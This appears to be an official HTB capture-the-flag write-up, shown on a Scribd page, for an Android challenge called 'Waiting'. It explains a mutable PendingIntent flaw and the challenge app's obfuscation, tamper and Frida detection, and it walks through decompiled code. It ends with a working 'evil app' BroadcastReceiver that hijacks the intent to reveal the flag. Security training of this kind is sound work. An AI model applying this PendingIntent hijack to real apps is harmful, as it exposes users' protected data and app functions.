[go: up one dir, main page]
Scribd
Upload
70 views6 pages

Waiting

This document outlines a challenge focused on the security vulnerabilities of Android's Pending Intents, specifically involving a malicious app exploiting a bug to retrieve a secret flag. It details the structure of the vulnerable application, the skills required to exploit it, and the anti-tampering measures in place. The document also provides guidance on developing a malicious application to successfully obtain the flag through reverse engineering and code analysis.

Uploaded by

Ye Zeiya Shein
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
70 views6 pages

Waiting

This document outlines a challenge focused on the security vulnerabilities of Android's Pending Intents, specifically involving a malicious app exploiting a bug to retrieve a secret flag. It details the structure of the vulnerable application, the skills required to exploit it, and the anti-tampering measures in place. The document also provides guidance on developing a malicious application to successfully obtain the flag through reverse engineering and code analysis.

Uploaded by

Ye Zeiya Shein
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 6

Waiting

6th March 2023 / Document No. D23.102.108

Prepared By : aris

Challenge Author(s) : jQuerty

Difficulty : Medium

Classification : Official

Synopsis
This challenge is about the security of Android's Pending Intents. The vulnerable application
displays the secret (flag) using a Pending Intent, but with the MUTABLE flag set, despite wrapping
an explicit intent (a good point from a security standpoint). The player has to find a security bug
through source code auditing, develop a malicious app able to exploit it and obtain the flag.

Description
The app stores a secret and says it is stored securely even in case the application. Are you able to
retrieve it?

Skills Required
High knowledge of Pending Intent in Android (a topic not very documented, not even in most
famous Android Security courses!).

How to leverage Pending Intents to get access to protected component/resources.

Basic reverse engineering skills.

Basic android development skills.


Skills Learned
Learn more about exploiting mutable Pending Intents.

Learn how to develop custom APKs for automating the exploitation process.

Enumeration
The app is divided into three activities:

MainActivity: where the security bug resides. Whenever this activity goes in the background
(technically when the onPause() method is called), a broadcast intent is sent for a particular
receiver configured to handle the com.example.waiting.RECEIVED action. This intent is broadcasted
every 5 seconds. It wraps a Pending Intent within the com.example.waiting.INTENT extra key which
in turn wraps another intent destinated to the MenuActivity (explicit intent). Because the
MUTABLE flag is set on the pending intent, a malicious application can append or modify extra
information in it. The MenuActivity checks if the intent received has the Secret extra key set to
true in order to display the secret (flag) to the end user. The goal of a malicious app is to add this
extra key to make the app display the secret. Every time the app is launched, anti-patching, anti-
reverse engineering tool and anti-debugging mechanims are activated to protect the app.

MenuActivity: a non-exported activity used to indicate that the secret is safe without revealing it.
Under the hood, this activity is also responsible for determining whether or not the app has been
tampered with.

SecretActivity: this activity displays the HTB Flag. It leverages a JNI function from the native library
secrets.cpp ( getdxXEPMNe() ) to retrieve the flag, which is not hardcoded in the C++ code (see
Secret Hiding paragraph below for more details).

Anti-Tampering
Defense Measures

Code Obfuscation (Control-Flow Obfuscation for Java code)

Secret Hiding (in the native code)

Tampering Detection (with code obfuscated)

Anti-Debugging Detection (with code obfuscated)

Reverse Engineering Tools Detection

Code Obfuscation

The java code is obfuscated except for the MainActivity where there is the security bug. The obfuscation was
done with (dProtect)[https://obfuscator.re/dprotect/], an Android bytecode obfuscator based on
Proguard.
Secret Hiding

The plugin hidden-secrets-gradle-plugin was used to hide the string. It uses a combination of
obfuscation techniques to do so:

secret is obfuscated using the reversible XOR operator, so it never appears in plain sight;

obfuscated secret is stored in a NDK binary as an hexadecimal array, so it is really hard to spot /
put together from a disassembly;

the obfuscating string is not persisted in the binary to force runtime evaluation (ie : prevent the
compiler from disclosing the secret by optimizing the de-obfuscation logic):

optionally, anyone can provide its own encoding / decoding algorithm when using the plugin to add
a security layer.

Tampering Detection & Anti-Debugging Detection

The anti-tampering checks are in place to lead the HTB user to exploit the vulnerability for which this
challenge was created. The implementation of the challenge aims to obtain the flag without tampering
with the app. The anti-tampering checks are:

CRC code of classes.dex: protection from code modification.

application signature: protection from resigning the app.

package name: checks on the package name.

debug mode: the app should not run in debug mode.

run on emulator: user must not run the app on an emulator.

Reverse Engineering Tools Detection

The lib-native.c native lib for checking Frida's evidence. This library has 3 ways to detect frida hooking:

Detect through named pipes used by Frida

Detect through frida specific named thread

Compare text section in memory with text section in disk for both libc and native library

(see https://github.com/darvincisec/DetectFrida for more details)

Analyzing the source code


Let's first decompile the APK file. Opening up the MainActivity we notice the creation of a Pending
Intent in line ( 33554432 stands for the MUTABLE flag):

PendingIntent activity = PendingIntent.getActivity(this, 0, intent, 33554432);

Viewing the MenuActivity we analyze the following piece of code to understand how the
SecretActivity will be launched. Every time the MenuActivity is created, it checks if the intent received
has the Secret extra key set to true:
public void onCreate(Bundle bundle) {
super.onCreate(bundle);
setContentView(R.layout.activity_menu);
do {
try {
System.out.println(Long.toString(a.a(this.j)));
} catch (IOException e) {
e.printStackTrace();
}
} while ((k + 1) % 2 == 0);
if (getIntent().getBooleanExtra("Secret", false)) {
try {
k();
Intent intent = new Intent(this, SecretActivity.class);
do {
startActivity(intent);
} while ((k + 1) % 2 == 0);
} catch (a.C0031a | IOException unused) {
Toast.makeText(this.j, "App Tampered!!", 0).show();
((TextView) findViewById(R.id.text_menu)).setText(R.string.tampered);
((TextView)
findViewById(R.id.text_menu_closing)).setText(R.string.tampered_closing);
new Handler().postDelayed(new Runnable() { // from class:
com.example.waiting.MenuActivity.1
@Override // java.lang.Runnable
public void run() {
MenuActivity.this.finishAndRemoveTask();
System.exit(0);
}
}, 10000L);
}
}
}

Analyzing the Smali code


In case of using a decompiler not able to decompile the code properly we should analyze the Smali code
of the MenuActivity and spot the instruction where the Secret extra key is verified (if the user patches
the app, it will not display the secret thanks to the anti-tampering checks!). Once the value is checked,
the SecretActivity will be launched:
L2d:
android.content.Intent r0 = r4.getIntent()
java.lang.String r1 = "Secret"
boolean r0 = r0.getBooleanExtra(r1, r5)
if (r0 == 0) goto L8e
L39:
r4.k() // Catch: java.lang.Throwable -> L56
android.content.Intent r0 = new android.content.Intent // Catch: java.lang.Throwable -
> L56
java.lang.Class<com.example.waiting.SecretActivity> r1 =
com.example.waiting.SecretActivity.class
r0.<init>(r4, r1) // Catch: java.lang.Throwable -> L56
L43:
r4.startActivity(r0) // Catch: java.lang.Throwable -> L56

Once understood the code, it's time to develop a malicious application. We should perform the following
steps:

First, we should define, create and register a Broadcast Receiver in the evil app (similar to the code
shown below in the Getting the Flag section).

Install the evil app on the device/emulator.

Open the Waiting app and do not click on the Menu button.

Send the app in background.

Open the evil app and wait. The SecretActivity will appear with the secret flag displayed.

Getting the Flag


The Solver.apk is provided in the htb folder. The following is an example of a BroadcastReceiver needed
to exploit the vulnerability and resolve the challenge.

package com.example.evilapp;

import android.app.PendingIntent;
import android.content.BroadcastReceiver;
import android.content.ComponentName;
import android.content.Context;
import android.content.Intent;
import android.os.Handler;

public class MyReceiver extends BroadcastReceiver {

@Override
public void onReceive(Context context, Intent intent) {

PendingIntent fromOtherApp = (PendingIntent)


intent.getParcelableExtra("com.example.waiting.INTENT");
System.out.println("Intent Received!");
if(fromOtherApp != null){
Runnable theTimeHasCome = new Runnable() {
@Override
public void run() {
try {
System.out.println("Broadcast activated");
//fromOtherApp.send();
Intent hijackIntent = new Intent();
hijackIntent.putExtra("Secret", true);
fromOtherApp.send(context.getApplicationContext(), 0, hijackIntent,
null, null);
System.out.println("Pending Intent sent");
} catch (PendingIntent.CanceledException e) {
e.printStackTrace();
}
}
};
(new Handler()).postDelayed(theTimeHasCome,2000);
}
else System.out.println("you shouldn't come here");
}
}

You might also like